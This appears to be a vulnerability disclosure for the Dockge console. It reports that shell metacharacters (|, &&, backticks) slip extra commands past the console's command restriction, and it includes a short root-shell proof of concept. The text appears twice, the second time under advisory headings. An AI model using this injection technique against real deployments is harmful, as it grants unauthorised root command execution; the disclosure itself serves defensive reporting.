Sorry I was unable to post this to the dockge repo as I got a 404.
The dockge console limits the available commands but it is possible to bypass these controls and execute arbitrary commands.
Using shell meta characters such as ` & and | allow additional commands to be run.
root@8f4c2fe8e8b4:/home/bob/docker# ls | id
uid=0(root) gid=0(root) groups=0(root)
root@8f4c2fe8e8b4:/home/bob/docker# ls && id
[removed]
uid=0(root) gid=0(root) groups=0(root)
root@8f4c2fe8e8b4:/home/bob/docker# ls `id`
ls: cannot access 'uid=0(root)': No such file or directory
ls: cannot access 'gid=0(root)': No such file or directory
ls: cannot access 'groups=0(root)': No such file or directory
Ability to run and command with root privs.
didn0t Reporter
Summary
Sorry I was unable to post this to the dockge repo as I got a 404.
The dockge console limits the available commands but it is possible to bypass these controls and execute arbitrary commands.
Details
Using shell meta characters such as ` & and | allow additional commands to be run.
PoC
Impact
Ability to run and command with root privs.